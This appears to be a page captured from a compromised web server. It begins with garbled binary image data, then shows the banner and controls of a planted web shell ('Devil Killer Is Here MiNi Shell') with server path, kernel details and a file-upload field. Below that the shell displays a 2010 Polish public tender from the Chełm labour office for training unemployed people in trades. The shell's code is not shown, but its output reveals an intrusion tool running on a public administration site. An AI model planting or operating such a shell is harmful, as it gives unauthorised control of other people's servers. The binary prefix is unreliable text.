JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100423/96461-N-2010.html

<p class="kh_header"><b>Chełm: Organizacja szkoleń grupowych dla osób bezrobotnych w zakresie:
Glazurnik dla 15 osób,
Monter-konserwator instalacji wodno-kanalizacyjnej dla 24 osób w II grupach po 12 osób,
Pracownik remontowo-budowlany dla 30 osób w II grupach po 15 osób,
Kucharz małej gastronomii dla 36 osób w III grupach po 12 osób,
Cukiernik dla 15 osób</b><br>
<b>Numer ogłoszenia: 96461 - 2010; data zamieszczenia: 23.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chełmie , Pl. Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 082 5627697, faks 082 5627668.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.chelm-samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja szkoleń grupowych dla osób bezrobotnych w zakresie:
Glazurnik dla 15 osób,
Monter-konserwator instalacji wodno-kanalizacyjnej dla 24 osób w II grupach po 12 osób,
Pracownik remontowo-budowlany dla 30 osób w II grupach po 15 osób,
Kucharz małej gastronomii dla 36 osób w III grupach po 12 osób,
Cukiernik dla 15 osób.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkolenia zawodowego kod CPV 80530000-8
Szkolenia będą realizowane dla osób bezrobotnych ze środków Funduszu Pracy oraz Europejskiego Funduszu Społecznego
Wymagania zamawiającego:
Zajęcia powinny odbywać się:
- w formie kursu, realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu,
- w dni powszednie od poniedziałku do piątku, z wyjątkiem dni świątecznych,
- w godz. 8.00 - 18.00 ( 6 godzin zegarowych zajęć dziennie)
- w formie zajęć teoretycznych i praktycznych 
- na terenie Miasta Chełm
Każdy kurs musi zakończyć się egzaminem wewnętrznym 
Terminy szkoleń każdorazowo będą ustalane pomiędzy Zamawiającym a Wykonawcą, który zobowiązany jest sporządzić i przekazać Zamawiającemu, harmonogram szkolenia (sporządzony wg podanego wzoru) na minimum 3 dni przed rozpoczęciem kursu. Wskazane terminy realizacji w opisach szkoleń są tylko terminami przewidywanymi a niewiążącymi. Wiążący termin rozpoczęcia szkolenia grupowego to 10 dni od dnia przekazania informacji Wykonawcy o rozpoczęciu szkolenia a termin zakończenia wynika z harmonogramu przedstawionego na trzy dni przed rozpoczęciem szkolenia 
    Wykonawca zobowiązany będzie do prowadzenia dokumentacji (wg otrzymanego wzoru) obejmującej:
- indywidualne listy obecności uczestników szkolenia;
- dziennik zajęć zawierający listę obecności, wymiar godzin i tematy   zajęć edukacyjnych;
- imienne indywidualne potwierdzenie otrzymanych posiłków
- imienny wykaz potwierdzający odbiór materiałów dydaktycznych  i biurowych przez uczestników szkolenia;
- rejestr wydanych zaświadczeń potwierdzających ukończenie szkolenia;
- protokół z egzaminu
Wykonawca, pod rygorem utraty prawa do wynagrodzenia za szkolenie, zobowiązany będzie do   niezwłocznego poinformowania Zamawiającego o:
- nie zgłoszeniu się uczestników na szkolenie;
- przerwaniu szkolenia lub rezygnacji z uczestnictwa oraz każdorazowej nieobecności skierowanych osób bezrobotnych;
- innych sytuacjach, które mają wpływ na realizację programu szkolenia i umowy
Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 7 dni od dnia zakończenia szkolenia, następujących dokumentów:
- oryginału ankiet oceniających szkolenie przeprowadzonych wśród uczestników szkolenia;
- imiennych wykazów osób, które ukończyły szkolenie;
- imiennych wykazów osób, które nie ukończyły szkolenia;
- list obecności 
- kserokopii protokołu z egzaminu poświadczonych za zgodność z oryginałem;
- kserokopii wszystkich zaświadczeń potwierdzających ukończenie szkolenia, poświadczonych  za zgodność z oryginałem;
- oryginału imiennego wykazu potwierdzającego odbiór materiałów dydaktycznych  i biurowych przez uczestników szkolenia;
- oryginału imiennych potwierdzeń otrzymanych posiłków 
- innej dokumentacji niezbędnej do rozliczenia kursu.
Wykonawca winien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. Sale dydaktyczne powinny być wyposażone stosownie do potrzeb grupy słuchaczy ,tj. 
w miejsca siedzące, ławki/stoliki, sprzęt audiowizualny, flipchart, tablice szkolne lub magnetyczne
Wykonawca zobowiązany jest do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia, m.in. na podstawie formularza ankiety oceniającej, jak również do przedstawienia jej wyników Zamawiającemu.
Wykonawca, przed rozpoczęciem szkolenia, zobowiązany jest do zapoznania jego uczestników ze szczegółowym programem poprzez przekazanie im harmonogramu realizowanych zajęć.
W przypadku, gdy instytucja szkoleniowa nie posiada własnego lokalu - sal dydaktycznych na terenie Miasta Chełm, należy dołączyć do formularza ofertowego dokument (uwierzytelnioną przez Wykonawcę kopię) potwierdzający prawo do dysponowania lokalem umożliwiającym przeprowadzenie zajęć.
 Wykonawca musi wyznaczyć osobę, która będzie kierownikiem - koordynatorem kursu. Osoba ta musi przebywać (przez okres trwania kursu) w miejscu odbywania zajęć w celu zapewnienia prawidłowej organizacji zajęć i dysponować telefonem stacjonarnym lub komórkowym. Kierownikiem - koordynatorem nie może być osoba prowadząca zajęcia podczas kursu.


Wymagany program szkolenia według wzoru stanowiącego załącznik nr 1 winien zawierać informacje określone w rozporządzenie Ministra Pracy i Polityki Społecznej z dn. 02 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 476, poz. 315),tj.:
- nazwę i zakres szkolenia;
- czas trwania i sposób organizacji szkolenia;
- wymagania wstępne dla uczestników szkolenia;
- cele szkolenia;
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i praktycznej;
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych;
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych
- sposób sprawdzenia efektów szkolenia.
Program szkolenia opracowany w zgodzie z powyższymi założeniami przedstawia wykonawca, którego oferta została wybrana jako najkorzystniejsza na dwa dni przed podpisaniem umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków posiadania uprawnień do wykonywania określonej działalności lub czynności Wykonawca winien wykazać, iż posiada wpis do rejestru instytucji szkoleniowych  prowadzonego przez WUP właściwy ze względu na siedzibę instytucji szkoleniowej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 3 szkolenia odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia oraz załączeniu dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien wykazać dysponowanie:
- dla kursu glazurnik:
  maszyna do cięcia glazury 2 szt., poziomica 2 szt., szpachelki 5szt, kielnia 5 szt., wiertarka z mieszadłem 2 szt., wiertarki udarowe 1 szt., 
-dla kursu monter konserwator instalacji wodno-kanalizacyjnej:
gwintownica do rur 2 szt., piłki do cięcia 3 szt., klucze do rur 2 komplety, 
-dla kursu pracownik remontowo-budowlany:
maszyna do cięcia glazury 2 szt., poziomica 2 szt., szpachelki 5szt, kielnia 5 szt., wiertarka z mieszadłem 
2 szt., wiertarki udarowe 1 szt., łaty aluminiowe, łaty prowadzące drewniane
-dla kursu kucharz małej gastronomii:
sprzęt i narzędzia niezbędne do realizacji zajęć praktycznych, będący wyposażeniem pracowni gastronomicznej, m.in.: szafa mrożnicza, stanowisko ze zlewem do wstępnej obróbki warzyw, stół do czystej obróbki warzyw, stół do obróbki wyrobów mącznych, stół do obróbki ryb , stół do obróbki mięs, kuchnie gazowe czteropalnikowe z piekarnikami konwekcyjnymi, lodówko - zamrażarki, regał ociekowy na umyty sprzęt kuchenny, basen do mycia garnków i sprzętu kuchennego, zmywarka gastronomiczna z wyparzaniem z podstawą i pompami dozującymi płyny, garnki, patelnie, zestawy przyborów kuchennych (tarki, skrobaki do ryb, ubijaki do ziemniaków, cedzak, sito, naświetlacz do jaj, waga), zestawy noży, zestawy noży dekoracyjnych, nóż jarzyniak, tace antypoślizgowe, zastawy stołowe, zastawy szklane, robot kuchenny, maszynka do mięs, mikser ręczny
-dla kursu cukiernik:
sprzęt i narzędzia niezbędne do realizacji zajęć praktycznych, będący wyposażeniem pracowni gastronomicznej, m.in.: szafa mrożnicza, stół do obróbki wyrobów mącznych, kuchnie gazowe czteropalnikowe z piekarnikami konwekcyjnymi, lodówko - zamrażarki, regał ociekowy na umyty sprzęt kuchenny, basen do mycia garnków i sprzętu kuchennego, zmywarka gastronomiczna z wyparzaniem z podstawą i pompami dozującymi płyny, garnki, patelnie, zestawy przyborów kuchennych (tarki,  cedzak, sito, naświetlacz do jaj, waga), zestawy noży, zestawy noży dekoracyjnych, tace, zastawy stołowe, zastawy szklane, robot kuchenny, mikser ręczny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla kursu glazurnik:
2 osoby posiadające wykształcenie średnie budowlane, udokumentowane doświadczenie w prowadzeniu szkoleń z zakresu budownictwa, 1 osoba posiadająca wykształcenie wyższe oraz doświadczenie w prowadzeniu szkoleń z zakresu umiejętności poszukiwania pracy
-dla kursu monter konserwator instalacji wodno-kanalizacyjnej:
2 osoby posiadające wykształcenie średnie budowlane, udokumentowane doświadczenie w prowadzeniu szkoleń z zakresu budownictwa, 1 osoba posiadająca wykształcenie wyższe oraz doświadczenie w prowadzeniu szkoleń  z zakresu umiejętności poszukiwania pracy
- dla kursu pracownik remontowo-budowlany:
2 osoby posiadające wykształcenie średnie budowlane, udokumentowane doświadczenie w prowadzeniu szkoleń z zakresu budownictwa, 1 osoba posiadająca wykształcenie wyższe oraz doświadczenie w prowadzeniu szkoleń z zakresu umiejętności poszukiwania pracy
-dla kursu małej gastronomii:
2 osoby posiadające wykształcenie średnie gastronomiczne udokumentowane doświadczenie wprowadzeniu szkoleń z zakresu gastronomii, 1 osoba posiadająca wykształcenie wyższe oraz doświadczenie 
w prowadzeniu szkoleń z zakresu umiejętności poszukiwania pracy
- dla kursu cukiernik:
2 osoby posiadające wykształcenie średnie gastronomiczne udokumentowane doświadczenie w prowadzeniu szkoleń z zakresu gastronomii, 1 osoba posiadająca wykształcenie wyższe oraz doświadczenie w prowadzeniu szkoleń z zakresu umiejętności poszukiwania pracy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wpis do rejestru instytucji szkoleniowych  prowadzonego przez WUP właściwy ze względu na siedzibę instytucji szkoleniowej.
Wykonawca może polegać na  wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Program szkolenia - 10</li>
<li>3 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 10</li>
<li>4 - Kwalifikacje i doświadczenie kadry dydaktycznej w prowadzeniu zajęć - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chelm.samorzady.pl/zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Chełmie, Plac Niepodległości 1 
22-100 Chełm  p.172, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Chełmie , Plac Niepodległości 1,
22-100 Chełm  p.164.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia w zakresie:Pracownik remontowo-budowlany, Kucharz małej gastronomii 
Cukiernik - realizowane są w ramach projektu systemowego pn. Aktywni na rynku pracy-Program Operacyjny Kapitał Ludzki, Priorytet VI - Rynek pracy otwarty dla wszystkich, Działanie 6.1  Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenia poziomu aktywności zawodowej osób bezrobotnych finansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie -Monter konserwator instalacji wodno-kanalizacyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie Monter konserwator instalacji wodno-kanalizacyjnej finansowane ze środków Funduszu Pracy, liczba godzin szkolenia:210 godzin zegarowych, liczba osób do przeszkolenia 24 (dwie grupy 12 osobowe).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Program szkolenia - 10</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatu jakosci usług - 10</li>
<li>4. Kwalifikacje i doświadczenie kadry dydaktycznej w prowadzeniu zajęć - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie Pracownik remontowo-budowlany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie realizowane jest w ramach projektu systemowego Aktywni na rynku pracy finansowane z EFS,liczba godzin szkolenia 320, liczba osób do przeszkolenia 30 osób w 2 grupach po 15 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 30.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Program szkolenia - 10</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 10</li>
<li>4. Kwalifikacje i doświadczenie kadry dydaktycznej w prowadzeniu zajęć - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie-Glazurnik finansowane ze środków Funduszu Pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie Glazurnik finsnsowane ze środków Funduszu Pracy , liczba godzin szkolenia 150 godzin zegarowych, liczba osób do przeszkolenia 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Program szkolenia - 10</li>
<li>3. Posiadanie przez instytucję szkoleniową certfikatu jakości usług - 10</li>
<li>4. Kwalifikacje i doświadczenie kadry dydaktycznej w prowadzeniu zajęć - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie grupowe dla osób bezrobotnych  finansowane ze Srodków Europejskiego Funduszu Społecznego, liczba godzin szkolenia 170, liczba osób do przeszkolenia 36 osób w 3 grupach po 12 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Program szkolenia - 10</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 10</li>
<li>4. Kwalifikacje i doświadczenie kadry dydaktycznej w prowadzeniu zajęć - 40</li>
